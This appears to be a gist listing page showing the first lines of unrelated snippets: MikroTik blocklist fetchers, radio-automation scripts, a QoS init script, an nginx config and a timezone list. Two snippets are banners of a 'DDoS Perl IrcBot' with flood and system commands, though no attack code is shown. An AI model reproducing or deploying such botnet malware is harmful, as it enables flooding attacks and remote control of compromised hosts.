This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| :local apiPath "https://uablacklist.net/subnets_mikrotik.txt" | |
| :local tempFile "uablacklist.txt" | |
| :local listName "uablacklist" | |
| /log info "fetching UA blacklist registry ($apiPath)..." | |
| :put "fetching UA blacklist registry ($apiPath)..." | |
| /tool fetch url=$apiPath dst-path=$tempFile | |
| /log info "removing existing $listName..." | |
| :put "removing existing $listName..." |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| while ((Now >= T['12:00:00']) and (Now <= T['12:35:00']) and (Flag = 32)) do | |
| begin | |
| // Ab hier alles im While | |
| Liner := CAT['bett_temperaturen'].ChooseSong(smRandom, NoRules); | |
| Aux2.Volume := 40; | |
| Aux2.Queuesong(Liner) | |
| PAL.WaitForTime(StartTime1230); | |
| Queue.Clear; | |
| Cat['Popmusik_Poprock'].QueueTop(smRandom, NoRules); | |
| Cat['Programmpromos'].QueueTop(smRandom, NoRules); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| while | |
| ( | |
| ( | |
| ((Now >= T['11:50:00']) and (Now <= T['11:52:00'])) and | |
| ((DayOfWeek(NOW) = Monday) or (DayOfWeek(NOW) = Tuesday) or (DayOfWeek(NOW) = Wednesday) or (DayOfWeek(NOW) = Thursday) or (DayOfWeek(NOW) = Friday)) and (Flag = 1) | |
| ) or | |
| ( | |
| ((Now >= T['12:20:00']) and (Now <= T['12:22:00'])) and | |
| ((DayOfWeek(NOW) = Monday) or (DayOfWeek(NOW) = Tuesday) or (DayOfWeek(NOW) = Wednesday) or (DayOfWeek(NOW) = Thursday) or (DayOfWeek(NOW) = Friday) and (Flag = 1)) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| :do { | |
| :do { | |
| /file remove "/ipsum.rsc"; | |
| /file remove "/subnet.rsc"; | |
| } on-error={} | |
| :put "Downloading ipsum.rsc..."; | |
| :do { | |
| /tool fetch url="https://antifilter.download/list/ipsum.rsc" dst-path="/ipsum.rsc" | |
| } on-error={ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/perl | |
| ###################################################################################################################### | |
| ###################################################################################################################### | |
| ## DDoS Perl IrcBot v1.0 / 2017 by flood.ro Team ## [ Help ] ########################################### | |
| ## Stealth MultiFunctional IrcBot writen in Perl ####################################################### | |
| ## Teste on every system with PERL instlled ## !u @system ## | |
| ## ## !u @version ## | |
| ## This is a free program used on your own risk. ## !u @channel ## | |
| ## Created for educational purpose only. ## !u @flood ## |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/perl | |
| ###################################################################################################################### | |
| ###################################################################################################################### | |
| ## DDoS Perl IrcBot v1.0 / 2012 by w0rmer Security Team ## [ Help ] ######################################### | |
| ## Stealth MultiFunctional IrcBot writen in Perl ####################################################### | |
| ## Teste on every system with PERL instlled ## !u @system ## | |
| ## ## !u @version ## | |
| ## This is a free program used on your own risk. ## !u @channel ## | |
| ## Created for educational purpose only. ## !u @flood ## |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Diego García Gonzalez (diegargon) diego@envigo.net | |
| # v1.0 | |
| ### BEGIN INIT INFO | |
| # Provides: myQoS | |
| # Required-Start: networking, myFirewall | |
| # Required-Stop: | |
| # Should-Start: | |
| # Should-Stop: | |
| # Default-Start: 2 3 4 5 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| user nginx; | |
| # one(1) worker or equal the number of _real_ cpu cores. 4=4 core cpu | |
| worker_processes 4; | |
| # renice workers to reduce priority compared to system processes for | |
| # machine health. worst case nginx will get ~25% system resources at nice=15 | |
| worker_priority -5; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Africa/Abidjan | |
| Africa/Accra | |
| Africa/Addis_Ababa | |
| Africa/Algiers | |
| Africa/Asmara | |
| Africa/Bamako | |
| Africa/Bangui | |
| Africa/Banjul | |
| Africa/Bissau | |
| Africa/Blantyre |
OlderNewer